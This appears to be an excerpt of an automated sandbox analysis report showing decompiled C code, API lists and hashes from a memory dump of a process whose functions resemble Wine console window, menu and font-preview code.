								_t343 = _t342 - 0xc;
								_t236 = _v132 + 0xffffffff;
								_v132 = _t236;
								if(_t236 == 0) {
									break;
								}
								_v112 = _v112 + 1;
								_v108 = _v108 + 1;
								_v104 = _v104 + 0xffffffff;
								_v100 = _v100 + 0xffffffff;
								_t245 = GetStockObject(6);
								_t344 = _t343 - 4;
								 *_t344 = _v80.hdc;
								_v296 = _t245;
								SelectObject(??, ??);
								_t336 = _t344 - 8;
							}
							SelectObject(_v80, _v128);
							_t330 = _t343 - 8;
						}
						_v116 = _v116 + 1;
					}
					EndPaint(_a4,  &_v80);
					goto L17;
				} else {
					if(_v160 == 0x201) {
						GetClientRect(_a4,  &_v156);
						asm("cdq");
						_v140 = _v156.right / 8;
						_v172 = _a16 >> 0x00000010 & 0xffff;
						asm("cdq");
						_t262 =  >=  ? 8 : 0;
						_v136 =  >=  ? 8 : 0;
						asm("cdq");
						_v136 = (_a16 & 0xffff) / _v140 + _v136;
						SetWindowLongW(_a4, 0, _v136);
						InvalidateRect(GetDlgItem(GetParent(_a4), 0x206), 0, 0);
						InvalidateRect(_a4, 0, 0);
						L17:
						_v12 = 0;
					} else {
						_v12 = DefWindowProcW(_a4, _a8, _a12, _a16);
					}
				}
				return _v12;
			}




























































                          0x00bcbfa6
                          0x00bcbfa9
                          0x00bcbfb2
                          0x00bcbfe0
                          0x00bcbff6
                          0x00bcc007
                          0x00bcc00a
                          0x00bcc027
                          0x00bcc02d
                          0x00bcc030
                          0x00bcc033
                          0x00bcc03a
                          0x00bcc04c
                          0x00bcc04f
                          0x00bcc05d
                          0x00bcc06b
                          0x00bcc071
                          0x00bcc07f
                          0x00bcc08c
                          0x00bcc099
                          0x00bcc0a2
                          0x00bcc0b2
                          0x00bcc0b8
                          0x00bcc0bb
                          0x00bcc0c7
                          0x00bcc0ca
                          0x00bcc0ce
                          0x00bcc0d2
                          0x00bcc0e1
                          0x00bcc0fa
                          0x00bcc100
                          0x00bcc106
                          0x00bcc10c
                          0x00bcc12d
                          0x00bcc133
                          0x00bcc136
                          0x00bcc13f
                          0x00bcc148
                          0x00bcc14b
                          0x00bcc156
                          0x00bcc159
                          0x00bcc15d
                          0x00bcc161
                          0x00bcc169
                          0x00bcc16f
                          0x00bcc17b
                          0x00bcc17e
                          0x00bcc182
                          0x00bcc186
                          0x00bcc18c
                          0x00bcc198
                          0x00bcc19b
                          0x00bcc19f
                          0x00bcc1a3
                          0x00bcc1c6
                          0x00bcc1cc
                          0x00bcc1d8
                          0x00bcc1db
                          0x00bcc1df
                          0x00bcc1e3
                          0x00bcc1e9
                          0x00bcc1f5
                          0x00bcc1f8
                          0x00bcc1fc
                          0x00bcc200
                          0x00bcc206
                          0x00bcc20c
                          0x00bcc20f
                          0x00bcc215
                          0x00000000
                          0x00000000
                          0x00bcc226
                          0x00bcc22f
                          0x00bcc238
                          0x00bcc241
                          0x00bcc24b
                          0x00bcc251
                          0x00bcc257
                          0x00bcc25a
                          0x00bcc25e
                          0x00bcc264
                          0x00bcc264
                          0x00bcc279
                          0x00bcc27f
                          0x00bcc27f
                          0x00bcc28d
                          0x00bcc28d
                          0x00bcc2a2
                          0x00000000
                          0x00bcbfb8
                          0x00bcbfc8
                          0x00bcc2c0
                          0x00bcc2d4
                          0x00bcc2d7
                          0x00bcc2eb
                          0x00bcc2fc
                          0x00bcc310
                          0x00bcc313
                          0x00bcc324
                          0x00bcc331
                          0x00bcc351
                          0x00bcc392
                          0x00bcc3b3
                          0x00bcc3ed
                          0x00bcc3ed
                          0x00bcbfce
                          0x00bcc3e5
                          0x00bcc3e5
                          0x00bcbfc8
                          0x00bcc3ff

                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: Rect$Window$LongObject$ClientInvalidateParent$BeginBrushCreateDeleteFillItemPaintProcSelectSolidStock
                          • String ID:
                          • API String ID: 88183673-0
                          • Opcode ID: 737d4e750bfe2a5e7197338977ac355ce47ebaf064a707a4e4048f4a2f39b0ec
                          • Instruction ID: af2afb6b6923ee6e43d648b6dd158ed0f4c2cabb4f069d05ce57e008dea9290b
                          • Opcode Fuzzy Hash: 737d4e750bfe2a5e7197338977ac355ce47ebaf064a707a4e4048f4a2f39b0ec
                          • Instruction Fuzzy Hash: EFD17FB59043489FCB14EFACD58969DBBF1BB48300F20896DE899EB350DB349954CF86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCAE90 Relevance: 31.7, APIs: 21, Instructions: 226windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 49%
                          			E00BCAE90(struct HMENU__* _a4, intOrPtr _a8) {
				int _v8;
				struct HINSTANCE__* _v12;
				struct HMENU__* _v16;
				short _v528;
				void* _v536;
				void* _v540;
				void* _v544;
				int _v548;
				int _v552;
				int _v556;
				int _v560;
				int _v564;
				int _v568;
				int _v572;
				WCHAR* _v576;
				int _v580;
				struct HINSTANCE__* _t129;
				int _t131;
				int _t135;
				int _t139;
				int _t143;
				int _t147;
				int _t151;
				int _t155;
				int _t159;
				int _t163;
				void* _t199;
				void* _t200;
				void* _t218;
				struct HINSTANCE__** _t225;
				struct HMENU__** _t226;

				_t129 = GetModuleHandleW(0);
				_t200 = _t199 - 4;
				_v12 = _t129;
				if(_a4 != 0) {
					_v16 = CreateMenu();
					if(_v16 != 0) {
						_t131 =  &_v528;
						_v548 = _t131;
						0x7c0000();
						LoadStringW(_v12, 0x110,  &_v528, _t131);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x110,  &_v528);
						_t135 =  &_v528;
						_v552 = _t135;
						0x7c0000();
						LoadStringW(_v12, 0x111,  &_v528, _t135);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x111,  &_v528);
						_t139 =  &_v528;
						_v556 = _t139;
						0x7c0000();
						LoadStringW(_v12, 0x112,  &_v528, _t139);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x112,  &_v528);
						_t143 =  &_v528;
						_v560 = _t143;
						0x7c0000();
						LoadStringW(_v12, 0x113,  &_v528, _t143);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x113,  &_v528);
						_t147 =  &_v528;
						_v564 = _t147;
						0x7c0000();
						LoadStringW(_v12, 0x114,  &_v528, _t147);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x114,  &_v528);
						_t151 =  &_v528;
						_v568 = _t151;
						0x7c0000();
						LoadStringW(_v12, 0x115,  &_v528, _t151);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x115,  &_v528);
						_t218 = _t200 - 0xffffffffffffff18;
						if(_a8 != 0) {
							InsertMenuW(_a4, 0xffffffff, 0xc00, 0, 0);
							_t218 = _t218 - 0x14;
						}
						_t155 =  &_v528;
						_v572 = _t155;
						0x7c0000();
						LoadStringW(_v12, 0x100,  &_v528, _t155);
						InsertMenuW(_a4, 0xffffffff, 0x410, _v16,  &_v528);
						_t159 =  &_v528;
						_v576 = _t159;
						0x7c0000();
						LoadStringW(_v12, 0x101,  &_v528, _t159);
						InsertMenuW(_a4, 0xffffffff, 0x400, 0x101,  &_v528);
						_t163 =  &_v528;
						_v580 = _t163;
						0x7c0000();
						_t225 = _t218 - 0xffffffffffffffb4;
						 *_t225 = _v12;
						_v580 = 0x102;
						_v576 =  &_v528;
						_v572 = _t163;
						LoadStringW(??, ??, ??, ??);
						_t226 = _t225 - 0x10;
						 *_t226 = _a4;
						_v580 = 0xffffffff;
						_v576 = 0x400;
						_v572 = 0x102;
						_v568 =  &_v528;
						InsertMenuW(??, ??, ??, ??, ??);
						_t200 = _t226 - 0x14;
						_v8 = 1;
					} else {
						_v8 = 0;
					}
				} else {
					_v8 = 0;
				}
				return _v8;
			}


































                          0x00bcaea8
                          0x00bcaeae
                          0x00bcaeb1
                          0x00bcaeb8
                          0x00bcaed0
                          0x00bcaed7
                          0x00bcaee9
                          0x00bcaeef
                          0x00bcaef2
                          0x00bcaf16
                          0x00bcaf47
                          0x00bcaf50
                          0x00bcaf56
                          0x00bcaf59
                          0x00bcaf7d
                          0x00bcafae
                          0x00bcafb7
                          0x00bcafbd
                          0x00bcafc0
                          0x00bcafe4
                          0x00bcb015
                          0x00bcb01e
                          0x00bcb024
                          0x00bcb027
                          0x00bcb04b
                          0x00bcb07c
                          0x00bcb085
                          0x00bcb08b
                          0x00bcb08e
                          0x00bcb0b2
                          0x00bcb0e3
                          0x00bcb0ec
                          0x00bcb0f2
                          0x00bcb0f5
                          0x00bcb119
                          0x00bcb14a
                          0x00bcb150
                          0x00bcb157
                          0x00bcb185
                          0x00bcb18b
                          0x00bcb18b
                          0x00bcb18e
                          0x00bcb194
                          0x00bcb197
                          0x00bcb1bb
                          0x00bcb1eb
                          0x00bcb1f4
                          0x00bcb1fa
                          0x00bcb1fd
                          0x00bcb221
                          0x00bcb252
                          0x00bcb25b
                          0x00bcb261
                          0x00bcb264
                          0x00bcb269
                          0x00bcb275
                          0x00bcb278
                          0x00bcb280
                          0x00bcb284
                          0x00bcb288
                          0x00bcb28e
                          0x00bcb29a
                          0x00bcb29d
                          0x00bcb2a5
                          0x00bcb2ad
                          0x00bcb2b5
                          0x00bcb2b9
                          0x00bcb2bf
                          0x00bcb2c2
                          0x00bcaedd
                          0x00bcaedd
                          0x00bcaedd
                          0x00bcaebe
                          0x00bcaebe
                          0x00bcaebe
                          0x00bcb2d3

                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CreateHandleMenuModule
                          • String ID:
                          • API String ID: 4123625242-0
                          • Opcode ID: e6db5e83bb39eec4ebf804c563b7068698259dd557bc4ce1a69e66ad6d6aa342
                          • Instruction ID: bb0796fd3daa89155310da6365e9be6a377605cd5a98ccc22c38d1cf9ccd3f6c
                          • Opcode Fuzzy Hash: e6db5e83bb39eec4ebf804c563b7068698259dd557bc4ce1a69e66ad6d6aa342
                          • Instruction Fuzzy Hash: E7C1A6B4808304DFD714EF68D48969EBBF0FB44314F50CAADE8A997295D7749688CF82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCBD32 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 135COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: LongTextWindow$ColorObjectPaintSelect$BeginBrushCreateFillHandleItemLoadModuleParentRectSolidString
                          • String ID: ASCII: abcXYZ
                          • API String ID: 3404974346-732927841
                          • Opcode ID: 3b9223b68fa02dbde8d8ffa9ce5c6225efc3e01fefc29a5e15c2dca4148cbb2f
                          • Instruction ID: 2f3dd04c4d94201c0e0708e037a11e62d9cf4e0ff396e4ee09c3315d57174efb
                          • Opcode Fuzzy Hash: 3b9223b68fa02dbde8d8ffa9ce5c6225efc3e01fefc29a5e15c2dca4148cbb2f
                          • Instruction Fuzzy Hash: 846186B19083458FCB04EFA8D58965EBFF0BF48305F11896DE8899B354EB749588CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCA6E0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181registryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 29%
                          			E00BCA6E0(void* __edi, struct HINSTANCE__* _a4, intOrPtr _a8) {
				intOrPtr _v12;
				char _v216;
				char _v428;
				struct _WNDCLASSW _v468;
				char _v980;
				struct HINSTANCE__* _v984;
				char* _v988;
				char* _v992;
				char* _v996;
				intOrPtr _v1000;
				void* _v1008;
				intOrPtr _v1012;
				struct HINSTANCE__* _v1016;
				intOrPtr _v1020;
				char* _v1024;
				struct HINSTANCE__* _t110;
				struct HINSTANCE__* _t115;
				int _t117;
				intOrPtr* _t118;
				void* _t155;
				void* _t156;
				struct HINSTANCE__** _t165;
				struct HINSTANCE__** _t166;
				intOrPtr* _t167;
				intOrPtr* _t169;

				_t153 = __edi;
				L00BDB12A();
				E00BCFC90(__edi,  &_v428, 0, 0xd4);
				_v428 = _a4;
				if(_a8 == 0) {
					_v1016 = 0;
					_v1012 =  &_v428 + 4;
					E00BC33D0(_t153);
					_t156 = _t155 - 8;
				} else {
					_v1016 = _a4;
					_v1012 =  &_v428 + 4;
					E00BCB9C0();
					_t156 = _t155 - 8;
				}
				E00BCF710( &_v216,  &_v428 + 4, 0xcc);
				_v468.style = 0;
				_v468.lpfnWndProc = E00BCBC10;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConFontPreview";
				RegisterClassW( &_v468);
				_v468.style = 0;
				_v468.lpfnWndProc = E00BCBF90;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConColorPreview";
				RegisterClassW( &_v468);
				_t110 =  &_v980;
				_v1024 = _t110;
				0x7c0000();
				_t165 = _t156 - 0xffffffffffffffdc;
				_v984 = _t110;
				_v988 =  &_v980;
				_t113 =  !=  ? 0x121 : 0x120;
				_v992 =  !=  ? 0x121 : 0x120;
				 *_t165 = 0;
				_t115 = GetModuleHandleW(??);
				_t166 = _t165 - 4;
				 *_t166 = _t115;
				_v1024 = _v992;
				_v1020 = _v988;
				_v1016 = _v984;
				_t117 = LoadStringW(??, ??, ??, ??);
				_t167 = _t166 - 0x10;
				if(_t117 == 0) {
					 *_t167 =  &_v980;
					_v1024 = L"Setup";
					E00BD1257();
				}
				_t118 = _t167;
				 *((intOrPtr*)(_t118 + 4)) =  &_v428 + 4;
				 *_t118 =  &_v216;
				 *((intOrPtr*)(_t118 + 8)) = 0xcc;
				if(E00BCE08E() != 0) {
					if(_a8 != 0) {
						 *_t167 = _a4;
						_v1024 =  &_v428 + 4;
						E00BC4B10();
						_t169 = _t167 - 8;
						 *_t169 = _v428;
						E00BC8ED0();
						_t167 = _t169 - 4;
					}
					_v996 =  &_v428 + 4;
					if(_a8 == 0) {
						_v1000 = 0;
					} else {
						_v1000 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24));
					}
					 *_t167 = _v1000;
					_v1024 = _v996;
					E00BCC410();
					_v12 = 1;
				} else {
					_v12 = 1;
				}
				return _v12;
			}




























                          0x00bca6e0
                          0x00bca6f0
                          0x00bca710
                          0x00bca718
                          0x00bca722
                          0x00bca753
                          0x00bca75a
                          0x00bca75e
                          0x00bca763
                          0x00bca728
                          0x00bca734
                          0x00bca737
                          0x00bca73b
                          0x00bca740
                          0x00bca740
                          0x00bca784
                          0x00bca789
                          0x00bca799
                          0x00bca79f
                          0x00bca7a9
                          0x00bca7c5
                          0x00bca7cb
                          0x00bca7f0
                          0x00bca806
                          0x00bca80c
                          0x00bca81c
                          0x00bca82b
                          0x00bca834
                          0x00bca844
                          0x00bca84a
                          0x00bca854
                          0x00bca870
                          0x00bca876
                          0x00bca89b
                          0x00bca8b1
                          0x00bca8b7
                          0x00bca8c7
                          0x00bca8d6
                          0x00bca8df
                          0x00bca8e5
                          0x00bca8e8
                          0x00bca8ed
                          0x00bca8f0
                          0x00bca8fc
                          0x00bca912
                          0x00bca915
                          0x00bca91d
                          0x00bca924
                          0x00bca92a
                          0x00bca941
                          0x00bca944
                          0x00bca948
                          0x00bca94c
                          0x00bca950
                          0x00bca956
                          0x00bca95c
                          0x00bca96e
                          0x00bca971
                          0x00bca975
                          0x00bca975
                          0x00bca989
                          0x00bca98b
                          0x00bca98e
                          0x00bca990
                          0x00bca99f
                          0x00bca9b5
                          0x00bca9c7
                          0x00bca9ca
                          0x00bca9ce
                          0x00bca9d3
                          0x00bca9dc
                          0x00bca9df
                          0x00bca9e4
                          0x00bca9e4
                          0x00bca9f0
                          0x00bca9fa
                          0x00bcaa19
                          0x00bcaa00
                          0x00bcaa0c
                          0x00bcaa0c
                          0x00bcaa30
                          0x00bcaa33
                          0x00bcaa37
                          0x00bcaa3f
                          0x00bca9a5
                          0x00bca9a5
                          0x00bca9a5
                          0x00bcaa51

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: HandleLoadModule$ClassCursorObjectRegisterStock$StringVisibleWindow
                          • String ID: Setup$WineConColorPreview$WineConFontPreview$@_w
                          • API String ID: 3977189380-44089161
                          • Opcode ID: 42cb50f2ece5697ab8efe6702deae3115555f6ed8b7299dba6d0433d4f6b443a
                          • Instruction ID: ba494bcc74d1ab12347feab8230f33ebdb25e49e0e3d047869a53fae534e024d
                          • Opcode Fuzzy Hash: 42cb50f2ece5697ab8efe6702deae3115555f6ed8b7299dba6d0433d4f6b443a
                          • Instruction Fuzzy Hash: 0C919BB09052189FDB54EF68D98979DBBF4FB04344F0085AEE449D7351EB749A88CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC7B80 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 281COMMON
                          Download Yara Rule
                          APIs
                          • CreateEventW.KERNEL32 ref: 00BC7C0E
                          • EnterCriticalSection.KERNEL32 ref: 00BC7CDA
                          • MultiByteToWideChar.KERNEL32 ref: 00BC7D69
                          • LeaveCriticalSection.KERNEL32 ref: 00BC7E1D
                          • LeaveCriticalSection.KERNEL32 ref: 00BC7FBA
                          • EnterCriticalSection.KERNEL32 ref: 00BC7FD6
                          • CloseHandle.KERNEL32 ref: 00BC806E
                          • LeaveCriticalSection.KERNEL32 ref: 00BC808D
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CriticalSection$Leave$Enter$ByteCharCloseCreateEventHandleMultiWide
                          • String ID: H$input restore failed: %#lx$input setup failed: %#lx
                          • API String ID: 628538822-1542851097
                          • Opcode ID: bab688688bac78d2cc8ff369b8da07e604624bd92af6efefb1aeb280c0d95d77
                          • Instruction ID: 019d23849dec2d0841137163912f0aa45dee359c04cea2028f792f7d76bc2f7b
                          • Opcode Fuzzy Hash: bab688688bac78d2cc8ff369b8da07e604624bd92af6efefb1aeb280c0d95d77
                          • Instruction Fuzzy Hash: 00D1FCB1909255CFD711EF68D599BAEBBF4FB48304F0088ADE48997340DB749A88CF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC2440 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 177COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: Info$CharsetStartupTranslate
                          • String ID: WineConsoleClass$@_w
                          • API String ID: 3822699805-719599992
                          • Opcode ID: 4d9686d0902d815bbab4bb8a781b8f46b0225a54216bdc15926600a166a0f208
                          • Instruction ID: a844928a24ac9104cdd862451b3ab68981b0938ccf7d40a3414c54ac113f7efd
                          • Opcode Fuzzy Hash: 4d9686d0902d815bbab4bb8a781b8f46b0225a54216bdc15926600a166a0f208
                          • Instruction Fuzzy Hash: 759197B4904219CFDB10DF68D994B9EBBF0FB48304F1089ADE889AB351DB759A84CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC2E80 Relevance: 16.7, APIs: 11, Instructions: 228COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: Object$DeleteReleaseSelectText$CreateFaceFontIndirectInfoMetrics
                          • String ID:
                          • API String ID: 2170087643-0
                          • Opcode ID: 9f0baa4d58d35e6bd486a512c3677e66045f094a0f91e062c4776fe22187ee5a
                          • Instruction ID: be84b3289522b48426a5ff0985259ff61a35849a1b0ddd39ba90dc1bc0e4fd77
                          • Opcode Fuzzy Hash: 9f0baa4d58d35e6bd486a512c3677e66045f094a0f91e062c4776fe22187ee5a
                          • Instruction Fuzzy Hash: 32B17274A042489FCB14DF68D588B9DBBF1FF49314F1584A9E889DB361DB30EA84CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD7AE2 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E00BD7AE2(signed int __edx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int* _v52;
				intOrPtr _v56;
				signed int _v64;
				void* _v68;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				signed int _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t146;
				signed int _t152;
				void* _t155;
				signed char _t160;
				signed int _t161;
				void* _t163;
				void* _t166;
				void* _t169;
				intOrPtr* _t179;
				void* _t182;
				intOrPtr* _t183;
				signed int _t184;
				signed int _t185;
				signed int _t187;
				void* _t191;
				void* _t196;
				void* _t197;
				intOrPtr _t201;
				intOrPtr* _t202;
				signed int _t203;
				signed int _t210;
				signed int _t211;
				intOrPtr _t214;
				signed int* _t218;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t231;
				void* _t234;
				void* _t235;

				_t216 = __edx;
				_t218 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t204 = E00BD8CB8(_a8, _a16, _t218);
				_t235 = _t234 + 0xc;
				_v12 = _t204;
				if(_t204 < 0xffffffff || _t204 >= _t218[1]) {
					L67:
					E00BD1C3C(_t202, _t204, _t216, _t218, _t225);
					asm("int3");
					__eflags = _v88;
					_push(_t202);
					_t203 = _v92;
					_push(_t225);
					_push(_t218);
					_t219 = _v108;
					if(__eflags != 0) {
						_push(_a24);
						_push(_t203);
						_push(_t219);
						_push(_v0);
						E00BD7A49(_t203, _t219, _t225, __eflags);
						_t235 = _t235 + 0x10;
					}
					_t146 = _a36;
					__eflags = _t146;
					if(_t146 == 0) {
						_t146 = _t219;
					}
					E00BD42BE(_t204, _t146, _v0);
					_t226 = _a28;
					_push( *_a28);
					_push(_a16);
					_push(_a12);
					_push(_t219);
					E00BD7292(_t203, _t204, _t216, _t219, _a28, __eflags);
					E00BD8CD5(_t219, _a16,  *((intOrPtr*)(_t226 + 4)) + 1);
					_push(0x100);
					_push(_a32);
					_push( *((intOrPtr*)(_t203 + 0xc)));
					_push(_a16);
					_push(_a8);
					_push(_t219);
					_push(_v0);
					_t152 = E00BD7489(_t203, _t216, _t219, _t226, __eflags);
					__eflags = _t152;
					if(_t152 != 0) {
						E00BD428E(_t152, _t219);
						return _t152;
					}
					return _t152;
				} else {
					_t202 = _a4;
					if( *_t202 != 0xe06d7363 ||  *((intOrPtr*)(_t202 + 0x10)) != 3 ||  *((intOrPtr*)(_t202 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
						L22:
						_t216 = _a12;
						_v8 = _a12;
						goto L24;
					} else {
						_t225 = 0;
						if( *((intOrPtr*)(_t202 + 0x1c)) != 0) {
							goto L22;
						} else {
							_t155 = E00BD1CCE(_t202, _t204, _t216, _t218, 0);
							if( *((intOrPtr*)(_t155 + 0x10)) == 0) {
								L61:
								return _t155;
							} else {
								_t202 =  *((intOrPtr*)(E00BD1CCE(_t202, _t204, _t216, _t218, 0) + 0x10));
								_t191 = E00BD1CCE(_t202, _t204, _t216, _t218, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t191 + 0x14));
								if(_t202 == 0 ||  *_t202 == 0xe06d7363 &&  *((intOrPtr*)(_t202 + 0x10)) == 3 && ( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930522) &&  *((intOrPtr*)(_t202 + 0x1c)) == _t225) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E00BD1CCE(_t202, _t204, _t216, _t218, _t225) + 0x1c)) == _t225) {
										L23:
										_t216 = _v8;
										_t204 = _v12;
										L24:
										_v52 = _t218;
										_v48 = 0;
										__eflags =  *_t202 - 0xe06d7363;
